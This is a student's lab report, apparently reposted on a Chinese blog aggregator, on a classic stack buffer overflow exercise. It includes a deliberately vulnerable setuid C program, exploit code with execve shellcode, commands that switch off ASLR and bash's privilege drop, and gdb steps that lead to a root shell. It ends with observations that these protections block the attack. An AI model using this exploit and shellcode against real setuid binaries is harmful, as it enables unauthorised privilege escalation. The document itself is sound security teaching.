2. 程式人生 > >20165315 緩沖區溢出漏洞實驗

20165315 緩沖區溢出漏洞實驗

阿新 發佈:2018-10-14
x64 功能 ram bubuko int protect lib 但是 spa

20165315 緩沖區溢出漏洞實驗

一、實驗簡介

緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意片段。這一漏洞的出現是由於數據緩沖器和返回地址的暫時關閉,溢出會引起返回地址被重寫。

二、實驗步驟

1、前期準備

實驗樓提供的是 64 位 Ubuntu linux,而本次實驗為了方便觀察匯編語句,我們需要在 32 位環境下作操作,因此實驗之前需要做一些準備:

輸入命令安裝一些用於編譯 32 位 C 程序的軟件包:

  • sudo apt-get update

技術分享圖片

  • sudo apt-get install -y lib32z1 libc6-dev-i386

技術分享圖片

  • sudo apt-get install -y lib32readline-gplv2-dev

技術分享圖片

2、初始設置

  • 關閉地址空間隨機化功能,此功能用於隨機堆和棧的初始地址,使猜測準確的內存地址變得困難

sudo sysctl -w kernel.randomize_va_space=0

技術分享圖片

  • 為了進一步防範緩沖區溢出攻擊及其它利用 shell 程序的攻擊,許多shell程序在被調用時自動放棄它們的特權,不能在shell中保持root權限,這個防護措施在/bin/bash中實現。linux 系統中,/bin/sh 實際是指向 /bin/bash 或 /bin/dash 的一個符號鏈接。為了重現這一防護措施被實現之前的情形,我們使用另一個 shell 程序(zsh)代替 /bin/bash

設置zsh程序:

$sudo su
$cd /bin
$ rm sh
$ ln -s zsh sh
$ exit

技術分享圖片

  • 輸入命令“linux32”進入32位linux環境。此時你會發現,命令行用起來沒那麽爽了,比如不能tab補全了,輸入“/bin/bash”使用bash

技術分享圖片

3、漏洞程序

  • 在 /tmp 目錄下新建一個 stack.c 文件,並輸入如下內容:
/* stack.c */

/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[12];

    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}
  • 編譯該程序,並設置 SET-UID
$ sudo su
$ gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
$ chmod u+s stack
$ exit

技術分享圖片

4、攻擊程序

此程序目的在攻擊剛才的漏洞程序,並通過攻擊獲得 root 權限

在 /tmp 目錄下通過命令行wget http://labfile.oss.aliyuncs.com/courses/231/exploit.c輸入如下內容:

/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\x31\xc0" //xorl %eax,%eax
    "\x50"     //pushl %eax
    "\x68""//sh" //pushl $0x68732f2f
    "\x68""/bin"     //pushl $0x6e69622f
    "\x89\xe3" //movl %esp,%ebx
    "\x50"     //pushl %eax
    "\x53"     //pushl %ebx
    "\x89\xe1" //movl %esp,%ecx
    "\x99"     //cdq
    "\xb0\x0b" //movb $0x0b,%al
    "\xcd\x80" //int $0x80
    ;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");   //在buffer特定偏移處起始的四個字節覆蓋sellcode地址  
    strcpy(buffer + 100, shellcode);   //將shellcode拷貝至buffer,偏移量設為了 100

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
        fclose(badfile);
}

技術分享圖片

  • 得到 shellcode 在內存中的地址
$ gdb stack
$ disass main
$ b [地址]
$ r
$ i r $esp
$ q

技術分享圖片

  • 根據語句 strcpy(buffer + 100,shellcode); 我們計算 shellcode 的地址為 0xffffd420(十六進制) + 0x64(100的十六進制) = 0xffffd484(十六進制)

  • 修改exploit.c文件!將 \x??\x??\x??\x?? 修改為 \xc4\xd0\xff\xff

技術分享圖片

  • 編譯運行,可見,通過攻擊,獲得了root 權限
$ gcc -m32 -o exploit exploit.c
$ ./exploit
$ ./stack

技術分享圖片

三、實驗練習

1、通過命令 sudo sysctl -w kernel.randomize_va_space=2 打開系統的地址空間隨機化機制,重復用 exploit 程序攻擊 stack 程序,觀察能否攻擊成功,能否獲得root權限。

通過實驗,發現開啟地址空間隨機分配保護後,緩存區溢出攻擊失效:

技術分享圖片

技術分享圖片

2、將 /bin/sh 重新指向 /bin/bash(或/bin/dash),觀察能否攻擊成功,能否獲得 root 權限。

通過實驗,發現將 /bin/sh 重新指向 /bin/bash(或/bin/dash)後,緩存區溢出也不能攻擊:

技術分享圖片

四、實驗總結

這次實驗比較簡單,在實驗樓簡單明了的步驟過程的幫助下,我比較順利的完成了實驗。但是在實驗的過程中,我也犯了一點小錯,第一次是沒有將地址加上16進制的100,第二次是高低地址寫反了,都導致攻擊失敗,顯示段錯誤。經過反復實驗,最終攻擊成功。通過這次實驗,我明白了什麽是緩沖區溢出攻擊,即通過往程序的緩沖區寫超出其長度的內容,造成緩沖區的溢出,從而破壞程序的堆棧,造成程序崩潰或使程序轉而執行其它指令,以達到攻擊的目的,從而對Linux系統有了進一步的了解,對學習本課程有了很大的幫助。

20165315 緩沖區溢出漏洞實驗

相關推薦

20165315 漏洞實驗

x64 功能 ram bubuko int protect lib 但是 spa 20165315 緩沖區溢出漏洞實驗 一、實驗簡介 緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意片段。這一

20165318 漏洞實驗

-i size bad $0 一個 3.3 困難 shell dev 20165318 緩沖區溢出漏洞實驗 目錄 一、實驗簡介 二、實驗準備 三、實驗步驟 3.1初始設置 3.2shellcode 3.3漏洞程序 3.4攻擊程序 3.5攻擊結果 四、練習 五、參考資料

2018-2019-1 20165334《信息安全系統設計基礎》第三周學習總結及漏洞實驗

過程 信息安全 截圖 分享圖片 進入 種類 系統 xxx img 2018-2019-1 20165334《信息安全系統設計基礎》第三周學習總結及緩沖區溢出漏洞實驗 一、指令學習 gcc -Og -o xxx.c學習 -Og會告訴編譯器使用會生成符合原始c語言代碼的整體結構

centos漏洞-LibCurl IMAP響應處理不當導致漏洞

strlen 分配 yum -h null 不存在 pda -a rac 轉自https://blog.csdn.net/gosenkle/article/details/83691473 簡介:IMAP的FETCH響應包含了指示返回數據長度的數據,當響應

CSAPP lab3 bufbomb-攻擊實驗

代碼 我們 lob 棧幀 遞增 park global 緩沖 緩沖區溢出 完成這個實驗大概花費一天半的時間,看了很多大佬的博客,也踩了很多的坑,於是打算寫一篇博客重新梳理一下思路和過程,大概會有三篇博客吧。 實驗目的: 通過緩沖區溢出攻擊,使學生進一步理解IA-3

CSAPP lab3 bufbomb-攻擊實驗(下)bang boom kaboom

span tag eval nor %x put app test 以及 這裏先給出getbuf的反匯編代碼和棧結構,方便下面的使用。 棧結構: 第3關:bang 構造攻擊字符串作為目標程序輸入,造成緩沖區溢出,使目標程序能夠執行bang

2017-2018-2 20179215《網絡攻防實踐》seed實驗

程序 byte UC inux 最大 切換 guard RR 註意 seed緩沖區溢出實驗 有漏洞的程序: /* stack.c */ /* This program has a buffer overflow vulnerability. */ /* Our task i

使用Linux進行實驗的配置記錄

log 安全 執行權限 .org tac cnblogs fail ont 指令   在基礎的軟件安全實驗中,緩沖區溢出是一個基礎而又經典的問題。最基本的緩沖區溢出即通過合理的構造輸入數據,使得輸入數據量超過原始緩沖區的大小,從而覆蓋數據輸入緩沖區之外的數據,達到諸如修改函

20165317 寧心宇 實驗

lin 截圖 機制 初始配置 方便 inux .sh 添加 攻擊 20165317 寧心宇 緩沖區溢出實驗 內容: 在自己的電腦中完成https://www.shiyanlou.com/courses/231緩沖區溢出漏洞實驗 實驗 實驗步驟: 一、實驗的準備 實驗樓提供

Kali學習筆記33:Linux系統實驗

目標 x11 們的 mage 意義 查看 二進制 無法 linu 之前做過一個Windows應用SLmail的緩沖區溢出的實驗 這次來做一個Linux平臺的緩沖區溢出實驗: 緩沖區溢出是什麽? 學過匯編的應該知道,當緩沖區邊界限制不嚴格時,由於變量傳入畸形數據或程序運行錯誤

2018-2019-2 20165232《網絡對抗技術》Exp1 實驗

十六 切換 ont spa 技術 shell函數 字節 roo 字符串 2018-2019-2 20165232《網絡對抗技術》Exp1 緩沖區溢出實驗 實驗點1:逆向及Bof基礎實踐 實踐任務 用一個pwn1文件。 該程序正常執行流程是:main調用foo函數,foo函數

內存 system ron article 數據包 解決 動態分配 語言 fan 原理:通過往程序的緩沖區寫超出其長度的內容,造成緩沖區的溢出,從而破壞程序的堆棧,造成程序崩潰或使程序轉而執行其它指令,以達到攻擊的目的。造成緩沖區溢出的原因是程序中沒有仔細檢查用戶輸入的參數

如何處理Android中的防技術

libc 針對 div padding border gin 圖1 netd stdlib.h 【51CTO專稿】本文將具體介紹Android中的防緩沖區溢出技術的來龍去脈。 1、什麽是ASLR? ASLR(Address space layout random

【安全牛學習筆記】Linux

信息安全;security+;Linux緩沖區溢出FUZZING Crossfire 1.9.0版本接受入展socket連接時攢在緩沖區溢出漏洞 調試工具 edb運行平臺Kali i486虛擬機 [email protected]:~

攻擊

棧幀 變量 圖片 位置 全局 使用 c語言 百度百科 隨機化 圖片來源:http://blog.csdn.net/u010651541/article/details/49849557 主要根據此圖給出一些程序變量的分配情況,以及緩沖區溢出攻擊的簡單原理。 上述圖主要描述

【安全牛學習筆記】

security+ 信息安全 linux 數據與代碼邊界不清,導致程序執行代碼腳本:#! /bin/bashecho $1在終端中運行腳本,參數寫;或|加上命令,會被系統執行 源碼審計 逆向工程 對編譯後的文件反匯編 模糊測試 安裝包,對程序發送數值,監視反饋SLmail 安裝後開放110,

(原創)攻擊方式學習之(3) - (Buffer Overflow)

信息 進行 adding 操作 return 錯誤 com 兩個 it! 堆棧溢出 堆棧溢出通常是所有的緩沖區溢出中最容易進行利用的。了解堆棧溢出之前,先了解以下幾個概念: 緩沖區 簡單說來是一塊連續的計算機內存區域,可以保存相同數據類型的多個實例。 堆棧

windows下簡單的之slmail

經典 問題 shell ever 圖片 ttl 0x0d orm 設置斷點 緩沖區溢出是什麽? 當緩沖區邊界限制不嚴格時,由於變量傳入畸形數據或程序運行錯誤,導致緩沖區被“撐暴”,從而覆蓋了相鄰內存區域的數據 成功修改內存數據,可造成進程劫持,執行惡意代碼,獲取服務器控制權

2017-2018-2 20179205《網絡攻防技術與實踐》第十周作業 攻防研究

崩潰 exe 第十周 此外 root權限 計算 進制 close bind 《網絡攻防技術與實踐》第十周作業 緩沖區溢出攻防研究 一、實驗簡介 緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意

5m21d學習筆記

緩沖區溢出 開啟 測試平臺 password ech 撒旦 TP 題目 github mysql鏈接字符串函數 concat(str1,str2) concat_ws(separator,str1,str2....) group_concat(str1,str2....)